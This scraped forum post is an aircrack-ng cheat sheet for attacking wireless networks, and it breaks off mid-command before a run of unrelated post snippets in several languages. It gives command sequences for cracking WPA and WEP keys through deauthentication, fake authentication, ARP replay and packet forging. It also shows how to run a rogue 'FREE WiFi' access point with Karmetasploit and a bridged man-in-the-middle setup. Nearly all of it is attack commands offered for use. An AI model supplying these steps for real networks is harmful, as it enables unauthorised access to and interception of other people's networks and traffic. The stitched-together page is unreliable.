For gurus, Wireless hacking, cracking and penetration with - TopicsExpress

For gurus, Wireless hacking, cracking and penetration with aircrack-ng... .. This is the full cheat (code) For easy running........ ................... After seeing someone on this forum confused by the aircrack-ng suite, I thought Id post this cheatsheet for the aircrack-ng suite published by Emergency. Setting TX POWER iw reg set BO iwconfig wlan1 txpower 25 Cracking WPA airmon-ng start wlan0 airodump-ng -c (channel) –bssid (AP MAC) -w (filename) mon0 aireplay-ng -0 1 -a (AP MAC) -c (VIC CLIENT) mon0 {disassociation attack} aircrack-ng -0 -w (wordlist path) (caputure filename) Cracking WEP with Connected Clients airmon-ng start wlan0 ( channel) airodump-ng -c (channel) –bssid (AP MAC) -w (filename) mon0 aireplay-ng -1 0 -e (ESSID) -a (AP MAC) -h (OUR MAC) mon0 {fake authentication} aireplay-ng -0 1 -a (AP MAC) -c (VIC CLIENT) mon0 {disassociation attack} aireplay-ng -3 -b (AP MAC) -h (OUR MAC) mon0 {ARP replay attack} Cracking WEP via a Client airmon-ng start wlan0 (channel) airodump-ng -c (channel) –bssid (AP MAC) -w (filename) mon0 aireplay-ng -1 0 -e (ESSID) -a (AP MAC) -h (OUR MAC) mon0 {fake authentication} aireplay-ng -2 -b (AP MAC) -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0 aireplay-ng -2 -r (replay cap file) mon0 {inject using cap file} aircrack-ng -0 -z(PTW) -n 64(64bit) filename.cap ARP amplification airmon-ng start wlan0 ( channel) airodump-ng -c (channel) –bssid (AP MAC) -w (filename) mon0 aireplay-ng -1 500 -q 8 -a (AP MAC) mon0 areplay-ng -5 -b (AP MAC) -h (OUR MAC) mon0 packetforge-ng -0 -a (AP MAC) -h (OUR MAC) -k 255.255.255.255 -l 255.255.255.255 -y (FRAGMENT.xor) -w (filename.cap) tcpdump -n -vvv -e -s0 -r (replay_dec.#####.cap) packetforge-ng -0 -a (AP MAC) -h (OUR MAC) -k (destination IP) -l (source IP) -y (FRAGMENT.xor) -w (filename.cap) aireplay-ng -2 -r (filename.cap) mon0 Cracking WEP /w shared key AUTH airmon-ng start wlan0 ( channel) airodump-ng -c (channel) –bssid (AP MAC) -w (filename) mon0 ~this will error out~aireplay-ng -1 0 -e (ESSID) -a (AP MAC) -h (OUR MAC) mon0 {fake authentication} aireplay-ng -0 1 -a (AP MAC) -c (VIC CLIENT) mon0 {deauthentication attack} aireplay-ng -1 60 -e (ESSID) -y (sharedkeyfile) -a (AP MAC) -h (OUR MAC) mon0 {fake authentication /w PRGA xor file} aireplay-ng -3 -b (AP MAC) -h (OUR MAC) mon0 {ARP replay attack} aireplay-ng -0 1 -a (AP MAC) -c (VIC CLIENT) mon0 {deauthentication attack} aircrack-ng -0 -z(PTW) -n 64(64bit) filename.cap ENVIROMENT VARIABLE SETUP cat filename for var in $(cat filename); do echo export $var >> .bashrc; done tail .bashrc Cracking a Clientless WEP (FRAG AND KOREK) {FRAG} airmon-ng start wlan0 (channel) airodump-ng -c (channel) –bssid (AP MAC) -w (filename) mon0 aireplay-ng -1 60 -e (ESSID) -a (AP MAC) -h (OUR MAC) mon0 {fake authentication} ~aireplay-ng -5 (frag attack) -b (AP MAC) -h (OUR MAC) mon0 packetforge-ng -0 -a (APMAC) -h (OUR MAC) -l 255.255.255.255 -k 255.255.255.255 -y (fragment filename) -w filename.cap tcpdump -n -vvv -e -s0 -r filename.cap {TEST} aireplay-ng -2 -r filename.cap mon0 {KOREK} ~aireplay-ng -4 -b (AP MAC) -h (OUR MAC) mon0 tcpdump -s 0 -s -e -r replayfilename.cap packetforge-ng -0 -a (APMAC) -h (OUR MAC) -l 255.255.255.255(source IP) -k 255.255.255.255(dest IP) -y (fragmentfilename xor) -w filename.cap aireplay-ng -2 -r filename.cap mon0 aircrack-ng -0 filename.cap Karmetasploit airbase-ng -c (channel) -P -C 60 -e “FREE WiFi” -v mon0 ifconfig at0 up 10.0.0.1/24 mkdir -p /var/run/dhcpd chown -R dhcpd:dhcpd /var/run/dhcpd touch /var/lib/dhcp3/dhcpd.leases cat dhcpd.conf touch /tmp/dhcp.log chown dhcpd:dhcpd /tmp/dhcp.log dhcpd3 -f -cf /tmp/dhcpd.conf -pf /var/run/dhcpd/pid -lf /tmp/dhcp.log at0 msfconsole -r /root/karma.rc Bridge CTRL man in the middle SETUP airebase-ng -c 3 -e “FREE WiFi” mon0 brctl addbr hacker(interface name) brctl addif hacker eth0 brctl addif hacker at0 ifconfig eth0 0.0.0.0 up ifconfig at0 0.0.0.0 up ifconfig hacker 192.168.1.8 up ifconfig hacker echo 1 > /proc/sys/net/ipv4/ip_forward pyrit DB attacks pyrit eval pyrit -i (wordlist) import_passwords pyrit -e (essid) create_essid pyrit batch pyrit batch -r (capturefile) -b(AP MAC) attack_db pyrit strip command pyrit -r (capturefile) -o (capturefile out

Je ne sais pas pourquoi. Mais e viens mapprendre que Austin Mahone

Hey, all of you thoughtful, beautiful people...It would be hard to

Well, this is just flipping brilliant....from the comments of a

#347 "This is for Ankit singh , he was 2 yrs junior from me but he

☁ ☀ ☁ IWC Aquatimer Jacques-Yves Cousteau Grey Dial

Texas A&M International University This Fall, TAMIU will offer a

Black friday CatEye Urban Wireless Computer for sale CLICK HERE

Me llamo Justin. De chico sufrí bullying. Se reían de mí por no

The new wine dries up and the vine withers; all the merrymakers

My 12 year son told me that he learnt about Federation today at

Today July 14, 2013 and in response to the new Facebook guidelines

Quero agradecer a todos que estão orando por meu filho Roldeynnes

Cranky Old Man What do you see nurses? . . .. . .What do you

This last song kind of came out of right field last minute and

★★★Learn how im make $500 per week and $10k more per month

After a few days most people who feel like we do go on with their

OPINYON NG SUNDALO SA BAKBAKAN SAZAMBOANGABest Actor si Zamboanga

This post is important!! Expecting parents, please please please

Having received the final vote counts from Rockland and Hanover,